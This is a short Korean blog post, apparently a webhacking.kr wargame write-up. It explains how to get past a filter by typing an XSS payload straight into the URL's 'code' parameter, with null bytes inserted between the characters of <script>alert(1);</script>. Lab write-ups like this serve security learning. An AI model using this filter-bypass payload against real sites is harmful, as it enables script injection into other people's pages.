728x90

input 태그에 입력하면 code라는 url 키의 값으로 주어짐

주소창에다가 code의 값에 다음 구문 직접 입력

input 태그에 입력하면 %가 %25로 url 인코딩 되기 때문에 직접 주소창에 입력해야함(';'도 반드시 입력해야 통과됨)

<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t%00%28%001%00%29%00;%00<%2F%00s%00c%00r%00i%00p%00t>

728x90

'webhacking.kr' 카테고리의 다른 글

webhacking 26(URL Encoding)  (0) 2022.12.18
webhacking 25(LFI)  (0) 2022.12.17
webhacking 24(PHP)  (0) 2022.12.17
webhacking 22(Blind SQL Injection)  (0) 2022.12.17
webhacking 21(Blind SQL Injection)  (0) 2022.12.16

+ Recent posts